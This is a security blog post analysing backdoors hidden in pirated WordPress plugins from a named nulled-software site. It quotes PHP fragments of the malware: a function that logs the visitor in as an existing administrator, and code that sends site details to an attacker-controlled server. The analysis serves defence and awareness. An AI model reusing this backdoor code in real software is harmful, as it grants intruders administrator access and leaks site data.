Pirated WordPress Plugins Bundled with Backdoors
One widespread belief among webmasters is that attackers typically only compromise websites in a couple of ways: by exploiting vulnerabilities or stealing login credentials.
Although these are certainly two of the more common attack vectors, another method is often overlooked — but the result is just as hazardous. Whenever an attacker can successfully trick a website owner into installing a backdoor on their website, they are able to accomplish the exact same goal: unauthorized access.
Nulled & Pirated Website Software
One extremely common method hackers use to trick website owners is to leverage nulled (or cracked/pirated) website software — especially premium third-party components. These might exist in the form of a WordPress plugin or theme, or perhaps a Magento extension.
Since these types of software usually require a fee to use or install, providers offer nulled or cracked versions that are “free” to download. What users might not realize is that “free” might come with a security price tag, and bad actors might be inclined to include a few malicious files or code snippets in a pirated version.
While not all nulled or cracked software have backdoors hidden within the code, attackers often consider this an excellent opportunity to distribute their malware. Using these components come with a lot of serious security implications, and backdoors can be difficult to detect until it’s too late.
Remote Access in Premium Plugins & Themes
For example, thewordpressclub[.]org is a nulled premium plugins and themes provider that offers a variety of “free” downloads for paid website components.
In their Terms of Service, they include a section on Remote Access:
As stated above, remote access within these files allows the provider to modify the plugin files’ code and create or modify database contents at their leisure — without notifying the website owner of any impending changes.
Remote access for this provider is accomplished through two files which are bundled within the nulled software download:
rms-script-ini.php rms-script-mu-plugin.php
The following lines are injected at the beginning of the main plugin or theme file.
The first file, rms-script-ini.php, is evaluated with a require_once() PHP function which uses the custom function rms_remote_manager_init() to initialize the activation remote handler.
require_once('rms-script-ini.php'); rms_remote_manager_init(__FILE__, 'rms-script-mu-plugin.php', false, false);
This malicious script, rms-script-ini.php, is also responsible for initializing other functions — such as creating a backdoor located at ./wp-contents/mu-plugins/rms_unique_wp_mu_pl_fl_nm.php.
$newname=WPMU_PLUGIN_DIR.$this->DS.'rms_unique_wp_mu_pl_fl_nm.php';
The backdoor is created with the filename rms_unique_wp_mu_pl_fl_nm.php, but the code it employs is copied from a second different PHP file, rms-script-mu-plugin.php, which is bundled with the nulled software download.
This second rms-script-mu-plugin.php file is responsible for a large portion of the heavy lifting, ultimately granting administrative privileges to the bad actor.
First, it checks for existing WordPress users through get_users(), querying for users with administrator role privileges. Then, it sets the wp-admin cookie to authenticate administrative access for whichever user it identifies:
// REMOTE LOGIN function remote_sign_in () { if(!$_GET['token'] && is_user_logged_in()) ... $users = get_users(); foreach($users as $user ) { $user_id = $user->ID; $data = get_userdata( $user_id ); $roles = $user->roles; if (in_array('administrator', $roles)) { log_me_in($user); exit; }} add_action('init', 'remote_sign_in' ); function log_me_in ($user) { if ( !is_wp_error( $user ) ) { wp_clear_auth_cookie(); wp_set_current_user ( $user->ID ); wp_set_auth_cookie ( $user->ID ); $redirect_to = user_admin_url(); wp_safe_redirect( $redirect_to ); exit(); }} //END REMOTE LOGIN
The rms-script-mu-plugin.php file, which is loaded and required to run the nulled software, also possesses a feature that sends out WordPress installation information relating to the website to a third-party web server controlled by the attackers.
/* ------------Register Config Variables------------ */ $GLOBALS['rms_report_to'] = 'https://managerly[.]org/wp-admin/admin-ajax.php'; ... // Gather data $data= [ 'title' => get_bloginfo('name'), 'url' => get_home_url(), 'ajax_url' => admin_url('admin-ajax.php'), 'ip' => $_SERVER['SERVER_ADDR'], 'tp' => $name, 'tp_status' => $activating, 'hash' => $hash, 'show_to_logged'=>$show_post ]; // send to rms $result = send_rms_curl_request('rms_ping_from_the_universe', ['site_data' => json_encode($data)]);
Conclusion & Mitigation Steps
Once a nulled software provider has administrator privileges for your WordPress or Magento website, they can easily begin to post content by modifying database contents whenever they want.
It’s in an attacker’s best interest to maintain unauthorized access to the site’s environment, so you can bet it includes some nifty features to evade detection or conceal indicators of compromise. For example, there are ways for attackers to manipulate the CSS display of the wp-admin interface so that you might not even be able to see posts that they created on your WordPress website.
And while you can delete the nulled WordPress plugin in wp-admin, it does not remove everything. In this particular piece of malware, the backdoor created upon installation will still exist at ./wp-contents/mu-plugins/rms_unique_wp_mu_pl_fl_nm.php.
On top of that, other backdoors can easily be installed simultaneously (or at their leisure), since attackers have the ability to create new backdoors on any website using nulled and infected software from thewordpressclub[.]org.
The best way to avoid this type of compromise is to avoid using any nulled or cracked software on your website. Don’t blindly trust links in forums or websites that offer downloads that don’t belong to them.
Get your plugins, extensions, themes, and other third-party components from reputable sources. If you need a free WordPress plugin, try searching for one in the official WordPress repository.